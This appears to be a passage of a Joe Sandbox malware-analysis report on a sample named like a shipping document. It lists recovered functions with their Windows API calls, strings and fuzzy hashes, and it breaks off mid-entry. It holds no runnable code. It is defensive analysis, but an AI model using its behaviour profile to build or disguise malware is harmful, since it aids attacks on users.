Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 0249ae8ae48876ca66a4fe88cd416cf4565bbcf5efe02156a06bae41a6f20297
Instruction ID: e1c31d1f43a98d9b89a493530ca5c463949a6c7387f7835792f1ff4e590885bb
Opcode Fuzzy Hash: 0249ae8ae48876ca66a4fe88cd416cf4565bbcf5efe02156a06bae41a6f20297
Instruction Fuzzy Hash: 5E01F936805205BFDB215BA5DC05BEEBB69EF91330F10021AFA25961D1EB71C951C7E0

Function 0009600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0009604C
GetStockObject.GDI32(00000011), ref: 00096060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0009606A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: a0e5322c1f8f2254ec1e152731a6b49177eedf32691a94012c96951b28fc1373
Instruction ID: 9f3314b37d118d0ab8035dabda6e5770688300b7373788f01754e4a92e31bc4d
Opcode Fuzzy Hash: a0e5322c1f8f2254ec1e152731a6b49177eedf32691a94012c96951b28fc1373
Instruction Fuzzy Hash: 7D116172501508BFEF224F949C94EEFBBA9EF58394F040115FA1452110D732ACA0EBA0

Function 000B3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 000B3B56

Part of subcall function 000B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 000B3AD2
Part of subcall function 000B3AA3: ___AdjustPointer.LIBCMT ref: 000B3AED

_UnwindNestedFrames.LIBCMT ref: 000B3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 000B3B7C
CallCatchBlock.LIBVCRUNTIME ref: 000B3BA4

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: d6d1156f3a775e8025591253470a43454d76ec7e351c56e24fdf0b54d1e85eee
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: C4012932100148BBDF126E95CC42EEB7BA9EF58754F144014FE4866122C732E961EBA0

Function 000C3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000913C6,00000000,00000000,?,000C301A,000913C6,00000000,00000000,00000000,?,000C328B,00000006,FlsSetValue), ref: 000C30A5
GetLastError.KERNEL32(?,000C301A,000913C6,00000000,00000000,00000000,?,000C328B,00000006,FlsSetValue,00132290,FlsSetValue,00000000,00000364,?,000C2E46), ref: 000C30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000C301A,000913C6,00000000,00000000,00000000,?,000C328B,00000006,FlsSetValue,00132290,FlsSetValue,00000000), ref: 000C30BF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: fa8588abd01b8016a019c7305b474331de239f11f0eb4813e12536e2e33e184e
Instruction ID: 4f423b663bf0760acf22e63d969284e63d915131d3d8af48a9653a40ab5ce1d7
Opcode Fuzzy Hash: fa8588abd01b8016a019c7305b474331de239f11f0eb4813e12536e2e33e184e
Instruction Fuzzy Hash: 0D01D833321622ABC7314B78AC54F6F7798AF05761B308628FA06D3140C721D955C6D0

Function 000F7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 000F747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000F7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000F74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000F74CA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: aee418093e424045ff5d704508eaed3041532e19ab427f81aea31720dbdc0963
Instruction ID: 4fc8d82b19645a1194b27edfe7e65e4f308d936b41ac12c4af509c9da0a6acac
Opcode Fuzzy Hash: aee418093e424045ff5d704508eaed3041532e19ab427f81aea31720dbdc0963
Instruction Fuzzy Hash: 7611A1B1205319ABE7309F14EC09BA67BFCEB00B00F108569E71AD7991D770F944EB92

Function 000FB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FACD3,?,00008000), ref: 000FB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FACD3,?,00008000), ref: 000FB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000FACD3,?,00008000), ref: 000FB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000FACD3,?,00008000), ref: 000FB126

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 4a91fe222e44f19d3c62d08c725aee49a32b6e7391805c3a8f1587fe17e80266
Instruction ID: c0bcb4d07f2efb3244d43a866edf35d9a7cfa6016fe84173dc122f013a932db5
Opcode Fuzzy Hash: 4a91fe222e44f19d3c62d08c725aee49a32b6e7391805c3a8f1587fe17e80266
Instruction Fuzzy Hash: E7116D31C01A2CEBCF14AFE4E9A96FEBB78FF49711F504085DA41B2581CB3096A19F91

Function 00127E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00127E33
ScreenToClient.USER32(?,?), ref: 00127E4B
ScreenToClient.USER32(?,?), ref: 00127E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00127E8A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 2f49ed89dc4ed66793042ce4c8384d8df985486e4a6bf0f6bd5ad2134e4d7ab4
Instruction ID: 68e1f145146dabea5a229ca157f5894fcfbcf30b29f137017d16a5316862e196
Opcode Fuzzy Hash: 2f49ed89dc4ed66793042ce4c8384d8df985486e4a6bf0f6bd5ad2134e4d7ab4
Instruction Fuzzy Hash: 0F1163B9D0024AAFDB51CF98D8849EEBBF5FF08310F104056E911E2610D734AAA5CF90

Function 000F2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 000F2DD6
GetCurrentThreadId.KERNEL32 ref: 000F2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F2DE4

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b2aa7a5aed03f9b7f90fdf4a0ea80cef99d07e6d54bc97a5693a2398daf92df7
Instruction ID: a655dfa2b99d84c136a324934a3d8930b2cd5904069196c6e832b11aa6c151ea
Opcode Fuzzy Hash: b2aa7a5aed03f9b7f90fdf4a0ea80cef99d07e6d54bc97a5693a2398daf92df7
Instruction Fuzzy Hash: 7FE06D71101628BBE7341B629C0EEFF7E6CEB42BA1F400115B305D59809AA48882D6F0

Function 00128863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 000A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000A9693
Part of subcall function 000A9639: SelectObject.GDI32(?,00000000), ref: 000A96A2
Part of subcall function 000A9639: BeginPath.GDI32(?), ref: 000A96B9
Part of subcall function 000A9639: SelectObject.GDI32(?,00000000), ref: 000A96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00128887
LineTo.GDI32(?,?,?), ref: 00128894
EndPath.GDI32(?), ref: 001288A4
StrokePath.GDI32(?), ref: 001288B2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 72e7337c2eac0fbacf0faebe52e014df29e6045f7bd849ab979e30bb1a8d248c
Instruction ID: 9e9ce1d8c53af0c95d784ca9b7e12094273c32d773cfd696973fb3c08352ba63
Opcode Fuzzy Hash: 72e7337c2eac0fbacf0faebe52e014df29e6045f7bd849ab979e30bb1a8d248c
Instruction Fuzzy Hash: ABF05E3A042668FAEB225F94AC0AFCE3F59AF06310F048000FB11654E2C7B555B2CFE9

Function 000A98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 000A98CC
SetTextColor.GDI32(?,?), ref: 000A98D6
SetBkMode.GDI32(?,00000001), ref: 000A98E9
GetStockObject.GDI32(00000005), ref: 000A98F1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 53478d1482a7d94e7f4beae833b2a4d3012e1d15dca596084eb87e32627ad269
Instruction ID: 491bb186d0bc5fa518e3fd7d4125272191d817e02c2269f22b08a78eeca8529a
Opcode Fuzzy Hash: 53478d1482a7d94e7f4beae833b2a4d3012e1d15dca596084eb87e32627ad269
Instruction Fuzzy Hash: 2DE06531244680FEDB315B75AC09BDD3F51AB52336F048219F7F9544E1C3B146A19B51

Function 000F162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000F1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,000F11D9), ref: 000F163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000F11D9), ref: 000F1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,000F11D9), ref: 000F164F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5b27a5695104aa1986db06bfae94ac5d84d9a8451c57c343e8eccad2d1bf84a2
Instruction ID: 2ec8606cd0b4479ee429ba4b94b92d26f8609258825ad7358c16ee3c5ed6ecee
Opcode Fuzzy Hash: 5b27a5695104aa1986db06bfae94ac5d84d9a8451c57c343e8eccad2d1bf84a2
Instruction Fuzzy Hash: C6E08635601211FBD7701FA0AD0DB9B3BBDAF54791F184808F345CA480D6344492C7D8

Function 000ED858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000ED858
GetDC.USER32(00000000), ref: 000ED862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000ED882
ReleaseDC.USER32(?), ref: 000ED8A3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4c3be2a4e8ced59f6318a0dd1d77895fab187e3450a215cb3c586a8c7ccb85c1
Instruction ID: 7433ab4e1b1a3ff3052e9c66a890802ebaeee70ceb8cd801aca8a38deed78af7
Opcode Fuzzy Hash: 4c3be2a4e8ced59f6318a0dd1d77895fab187e3450a215cb3c586a8c7ccb85c1
Instruction Fuzzy Hash: 89E01AB5C00204EFCF619FA0D908A6DBBB1FB08710F20801AF90AE7750CB384992AF80

Function 000ED86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 000ED86C
GetDC.USER32(00000000), ref: 000ED876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 000ED882
ReleaseDC.USER32(?), ref: 000ED8A3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b7a6af2b3265a8b2dbdd05b5b6ec3e8090938ccbaba6e707215a5f8c199fef97
Instruction ID: db1d947df7aaf8b19b94c28309f9fb81cf35519e72e5cd78bcefadc2fdf3ea50
Opcode Fuzzy Hash: b7a6af2b3265a8b2dbdd05b5b6ec3e8090938ccbaba6e707215a5f8c199fef97
Instruction Fuzzy Hash: 32E09A75C00204EFCF619FA0D808A6DBBB5FB08711B148459FA4AE7750D7385952AF94

Function 00104D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00097620: _wcslen.LIBCMT ref: 00097625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00104ED4

Strings

*, xrefs: 00104E10
LPT, xrefs: 00104DFB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 5cbf561b01debc225e80e75b248b857d2b5ed5ed2f087db567922d7dd911a573
Instruction ID: 19c04d631226634b7d947f8d9b94b94d0e57c2c1db607b726536bb7b3c213666
Opcode Fuzzy Hash: 5cbf561b01debc225e80e75b248b857d2b5ed5ed2f087db567922d7dd911a573
Instruction Fuzzy Hash: 449181B5A042059FCB14DF58C4C4EAABBF1BF44304F198099E94A9F3A2C7B5ED85CB90

Function 000BE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000BE30D

Strings

pow, xrefs: 000BE2E5, 000BE302

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 33589ac143b7f072c9628b5ba6c1e03db8b9bade58ea657f033fb112a52a2980
Instruction ID: 0bfd997245219281c92d4a47a491e383e542d948977f379c13b146c06cc94b6d
Opcode Fuzzy Hash: 33589ac143b7f072c9628b5ba6c1e03db8b9bade58ea657f033fb112a52a2980
Instruction Fuzzy Hash: 3E516D61A0C24296CB657724CD45BFD3BF8EF50B40F34896CE0DA822E9DB348CD59E86

Function 000AE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 000AE1B1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 3098c7e793658c8996b61f9cc9c9d423c97513b85973211a99b94d6c49c9ffb4
Instruction ID: b41c179173ec4d53bdc3952fd77161715dc4c36ae853388393aff95ac93f4e31
Opcode Fuzzy Hash: 3098c7e793658c8996b61f9cc9c9d423c97513b85973211a99b94d6c49c9ffb4
Instruction Fuzzy Hash: 595100355082CADFDF65DF69C481AFE7BE4EF66310F244059E891AB2D1DA309D42CBA0

Function 000AF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 000AF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 000AF2BB

Strings

@, xrefs: 000AF2AF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 43cba4004997a498f243735381951c6d6541a0becd483e86ea2a805fbd6d389d
Instruction ID: 2c427467357c4f4c850d691000da97c43007c9b6b979b2dbadbcb47bfcfa34de
Opcode Fuzzy Hash: 43cba4004997a498f243735381951c6d6541a0becd483e86ea2a805fbd6d389d
Instruction Fuzzy Hash: 5F515972418744ABE720AF10DC86BAFBBF8FB85300F81485CF1D9411A6EB718569CB67

Function 00115745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001157E0
_wcslen.LIBCMT ref: 001157EC

Strings

CALLARGARRAY, xrefs: 001157E6, 001157EB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 278053ca8fe60f251cbae8ee8f6d09a88766a52ada9e8ea1fcd8a3de22bf70ca
Instruction ID: c134a61c162cdbcf9c5b6cc067f65ed1b809a640a0df513d16b7e603aeb34760
Opcode Fuzzy Hash: 278053ca8fe60f251cbae8ee8f6d09a88766a52ada9e8ea1fcd8a3de22bf70ca
Instruction Fuzzy Hash: 76418071A00509DFCB18DFA9C8819FEBBB6FF99324F104169E515A7292E7309D81CB90

Function 0010D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0010D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0010D13A

Strings

|, xrefs: 0010D10B

Memory Dump Source

